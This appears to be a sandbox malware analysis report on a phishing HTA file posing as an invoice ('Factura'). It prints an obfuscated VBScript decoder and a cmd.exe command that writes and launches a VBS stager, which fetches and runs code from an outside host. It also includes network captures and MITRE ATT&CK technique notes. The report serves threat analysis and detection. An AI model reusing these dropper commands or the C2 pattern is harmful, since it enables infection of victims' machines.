Preview:	<?xml version="1.0" encoding="utf-8" ?>..<component id="component2">......<script language="VBScript">..<![CDATA[......function dejKxG77YT_17(kgntbIbRvDj_26, WwlnNyCZZ772S_1)..Dim JkcpS5XJGqhXLQOcqBvk0_27, VdoWzx9CHt3490LzCl_28..JkcpS5XJGqhXLQOcqBvk0_27 = asc(Mid(kgntbIbRvDj_26,1,1)) - 65..kgntbIbRvDj_26 = Mid(kgntbIbRvDj_26,2,Len(kgntbIbRvDj_26)-1)..Dim pluG8YQf_29..Dim uhRJ5YCUnUl22flp04_30..VdoWzx9CHt3490LzCl_28 = "".. while (Len(kgntbIbRvDj_26) > 0).. Gx4M7Y9zopF7CmljVmP0BE_80 = Mid(kgntbIbRvDj_26,1,1) .. pluG8YQf_29 = (asc(Gx4M7Y9zopF7CmljVmP0BE_80)-65) .. uhRJ5YCUnUl22flp04_30 = (asc(Mid(kgntbIbRvDj_26,2,1))-65).. VdoWzx9CHt3490LzCl_28 = VdoWzx9CHt3490LzCl_28 & (Chr(( (pluG8YQf_29) * 25 + uhRJ5YCUnUl22flp04_30 - JkcpS5XJGqhXLQOcqBvk0_27 - WwlnNyCZZ772S_1))) .. kgntbIbRvDj_26 = Mid(kgntbIbRvDj_26,3,Len(kgntbIbRvDj_26)-2).... wEnd.. .. dejKxG77YT_17 = VdoWzx9CHt3490LzCl_28..end function........const WwlnNyCZZ772S_1 = 92..GSZ0DgN8qe2_2 = dejKxG77YT_17("IFY" ,

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\g1[1].htm

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	357
Entropy (8bit):	5.209832565354849
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwol6hEr6VX16hu9nPtrLFwWtHGQcXnMKR+knLFwWtHGQcXNKzm8oD:J0+ox0RJWWPD9Qp0qp92Qm8+
MD5:	8D156A3026840157CA292D51F52152BC
SHA1:	6314B3E015735F52A605CA45608CD14F95FEF6A0
SHA-256:	CA74AE119560729490CBA0ECEE5FD787F05ACACFDC56E675C262A77DD827263C
SHA-512:	A4B7308A1DED43C6BBDB54DA93A850CF0590E9170827ED7AD968490AE9FC46114BB5CFEB081AFB901BBD1AF6257D7DE4A98638995DC6E0D67E781D37BC7C1EB0
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://102.57.205.92.host.secureserver.net/g1/">here</a>.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at 102.57.205.92.host.secureserver.net Port 443</address>.</body></html>.

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (5906), with CRLF, LF line terminators
Entropy (8bit):	5.90286896304314
TrID:	HyperText Markup Language with DOCTYPE (12503/2) 17.73% HyperText Markup Language (12001/1) 17.02% HyperText Markup Language (12001/1) 17.02% HyperText Markup Language (11501/1) 16.31% HyperText Markup Language (11501/1) 16.31%
File name:	Factura - XwgyvMuOAO.hta
File size:	30'366 bytes
MD5:	65e0b29205432c93c11211a9aa474ff6
SHA1:	1bcb0125fb5fb63460536b33e7b708479d5fb334
SHA256:	b7f0fa3e60b9984e1f79cb3554efc7c5c8437d79d4a74ff02ab3d1e34539f87d
SHA512:	ef7c253039028df1739d3faad2b5805d347dd112bcf3f7fe4e935126919d8092afc893bd05aa41199499c7fef3ee6d57a8c1239ecc4839d526def303ebf77cbe
SSDEEP:	768:Cj7cLaUtu/NZNSjQLxfvyHp28703twuSn:CjFYKdfvy303t/Sn
TLSH:	D3D27CB1CDC11C7B834E5E73AB7DDBF950B38650CA41678A92B8FA8A15877A7400FC58
File Content Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html lang="en">....<head>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8">.. <title> JQbDI7Fimuq7gCS</title>.. <hta:application application

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 15, 2024 00:57:59.609626055 CEST	49706	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:57:59.609673023 CEST	443	49706	92.205.57.102	192.168.2.5
Aug 15, 2024 00:57:59.609746933 CEST	49706	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:57:59.620040894 CEST	49706	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:57:59.620062113 CEST	443	49706	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:00.256825924 CEST	443	49706	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:00.256896019 CEST	49706	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:00.342125893 CEST	49706	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:00.342150927 CEST	443	49706	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:00.342576027 CEST	443	49706	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:00.342638969 CEST	49706	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:00.345966101 CEST	49706	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:00.392529964 CEST	443	49706	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:00.587539911 CEST	443	49706	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:00.587600946 CEST	49706	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:00.587618113 CEST	443	49706	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:00.587656975 CEST	49706	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:00.597131968 CEST	49706	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:00.597152948 CEST	443	49706	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:00.622824907 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:00.622864962 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:00.623111963 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:00.623610020 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:00.623625994 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:01.276525021 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:01.278386116 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:01.309568882 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:01.309580088 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:01.309815884 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:01.309822083 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:01.573636055 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:01.573760986 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:01.573774099 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:01.573854923 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:01.674240112 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:01.674249887 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:01.674276114 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:01.674415112 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:01.674415112 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:01.674433947 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:01.674593925 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:01.675844908 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:01.675982952 CEST	443	49707	92.205.57.102	192.168.2.5
Aug 15, 2024 00:58:01.676055908 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:01.676055908 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:01.683948994 CEST	49707	443	192.168.2.5	92.205.57.102
Aug 15, 2024 00:58:01.683971882 CEST	443	49707	92.205.57.102	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 15, 2024 00:57:59.591670036 CEST	56242	53	192.168.2.5	1.1.1.1
Aug 15, 2024 00:57:59.603858948 CEST	53	56242	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 15, 2024 00:57:59.591670036 CEST	192.168.2.5	1.1.1.1	0x7456	Standard query (0)	102.57.205.92.host.secureserver.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 15, 2024 00:57:59.603858948 CEST	1.1.1.1	192.168.2.5	0x7456	No error (0)	102.57.205.92.host.secureserver.net		92.205.57.102	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

102.57.205.92.host.secureserver.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	92.205.57.102	443	2220	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-14 22:58:00 UTC	298	OUT	GET //g1 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 102.57.205.92.host.secureserver.net Connection: Keep-Alive
2024-08-14 22:58:00 UTC	247	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 14 Aug 2024 22:58:00 GMT Server: Apache/2.4.41 (Ubuntu) Location: https://102.57.205.92.host.secureserver.net/g1/ Content-Length: 357 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-08-14 22:58:00 UTC	357	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 31 30 32 2e 35 37 2e 32 30 35 2e 39 32 2e 68 6f 73 74 2e 73 65 63 75 72 65 73 65 72 76 65 72 2e 6e 65 74 2f 67 31 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://102.57.205.92.host.secureserver.net/g1/">here</a>.</p><hr><address>A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	92.205.57.102	443	2220	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-14 22:58:01 UTC	298	OUT	GET /g1/ HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 102.57.205.92.host.secureserver.net Connection: Keep-Alive
2024-08-14 22:58:01 UTC	199	IN	HTTP/1.1 200 OK Date: Wed, 14 Aug 2024 22:58:01 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/plain;;charset=UTF-8
2024-08-14 22:58:01 UTC	6	IN	Data Raw: 36 34 61 30 0d 0a Data Ascii: 64a0
2024-08-14 22:58:01 UTC	16384	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0d 0a 3c 63 6f 6d 70 6f 6e 65 6e 74 20 69 64 3d 22 63 6f 6d 70 6f 6e 65 6e 74 32 22 3e 0d 0a 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 3c 21 5b 43 44 41 54 41 5b 0d 0a 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 64 65 6a 4b 78 47 37 37 59 54 5f 31 37 28 6b 67 6e 74 62 49 62 52 76 44 6a 5f 32 36 2c 20 57 77 6c 6e 4e 79 43 5a 5a 37 37 32 53 5f 31 29 0d 0a 44 69 6d 20 4a 6b 63 70 53 35 58 4a 47 71 68 58 4c 51 4f 63 71 42 76 6b 30 5f 32 37 2c 20 56 64 6f 57 7a 78 39 43 48 74 33 34 39 30 4c 7a 43 6c 5f 32 38 0d 0a 4a 6b 63 70 53 35 58 4a 47 71 68 58 4c 51 4f 63 71 42 76 6b 30 5f 32 37 20 3d Data Ascii: <?xml version="1.0" encoding="utf-8" ?><component id="component2"><script language="VBScript"><![CDATA[function dejKxG77YT_17(kgntbIbRvDj_26, WwlnNyCZZ772S_1)Dim JkcpS5XJGqhXLQOcqBvk0_27, VdoWzx9CHt3490LzCl_28JkcpS5XJGqhXLQOcqBvk0_27 =
2024-08-14 22:58:01 UTC	9376	IN	Data Raw: 31 41 73 49 78 71 54 64 58 62 4d 51 78 61 5f 31 31 29 0d 0a 78 51 67 67 6f 50 4e 49 55 38 65 6c 39 43 79 66 71 4c 4e 5a 5f 35 32 2e 4f 70 65 6e 20 69 6e 59 41 65 76 38 30 59 50 5a 33 51 55 5f 37 2c 20 42 48 56 4f 65 52 37 32 53 37 4e 56 44 73 58 31 5f 35 30 2c 20 46 61 6c 73 65 0d 0a 78 51 67 67 6f 50 4e 49 55 38 65 6c 39 43 79 66 71 4c 4e 5a 5f 35 32 2e 53 65 6e 64 0d 0a 0d 0a 67 52 54 42 70 63 4b 43 6d 6a 4d 5f 35 33 2e 74 79 70 65 20 3d 20 31 0d 0a 67 52 54 42 70 63 4b 43 6d 6a 4d 5f 35 33 2e 6f 70 65 6e 0d 0a 67 52 54 42 70 63 4b 43 6d 6a 4d 5f 35 33 2e 77 72 69 74 65 20 78 51 67 67 6f 50 4e 49 55 38 65 6c 39 43 79 66 71 4c 4e 5a 5f 35 32 2e 72 65 73 70 6f 6e 73 65 42 6f 64 79 0d 0a 67 52 54 42 70 63 4b 43 6d 6a 4d 5f 35 33 2e 73 61 76 65 74 6f 66 69 Data Ascii: 1AsIxqTdXbMQxa_11)xQggoPNIU8el9CyfqLNZ_52.Open inYAev80YPZ3QU_7, BHVOeR72S7NVDsX1_50, FalsexQggoPNIU8el9CyfqLNZ_52.SendgRTBpcKCmjM_53.type = 1gRTBpcKCmjM_53.opengRTBpcKCmjM_53.write xQggoPNIU8el9CyfqLNZ_52.responseBodygRTBpcKCmjM_53.savetofi
2024-08-14 22:58:01 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-08-14 22:58:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	18:57:57
Start date:	14/08/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\Factura - XwgyvMuOAO.hta"
Imagebase:	0x8b0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:57:58
Start date:	14/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k echo\|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo\|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	18:57:58
Start date:	14/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	18:57:58
Start date:	14/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:57:58
Start date:	14/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" set /p="OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO" 1>C:\\Users\\Public\\uoxx0.vbs"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:57:58
Start date:	14/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: cmd.exePID: 6188, Parent PID: 728

General

Target ID:	7
Start time:	18:57:58
Start date:	14/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")" 1>>C:\\Users\\Public\\uoxx0.vbs"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:57:58
Start date:	14/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:57:58
Start date:	14/08/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs"
Imagebase:	0x580000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 08EC0FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2062420143.0000000008EC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 08EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_8ec0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction ID: e0cd08272b204e5ae2f38cc70ad5864bc79a33c0668369e97803ea9bc6bb8cae
Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction Fuzzy Hash:

Function 08EC0FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2062420143.0000000008EC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 08EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_8ec0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction ID: e0cd08272b204e5ae2f38cc70ad5864bc79a33c0668369e97803ea9bc6bb8cae
Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction Fuzzy Hash:

Function 08EC0FD7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2062420143.0000000008EC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 08EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_8ec0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction ID: e0cd08272b204e5ae2f38cc70ad5864bc79a33c0668369e97803ea9bc6bb8cae
Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction Fuzzy Hash:

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

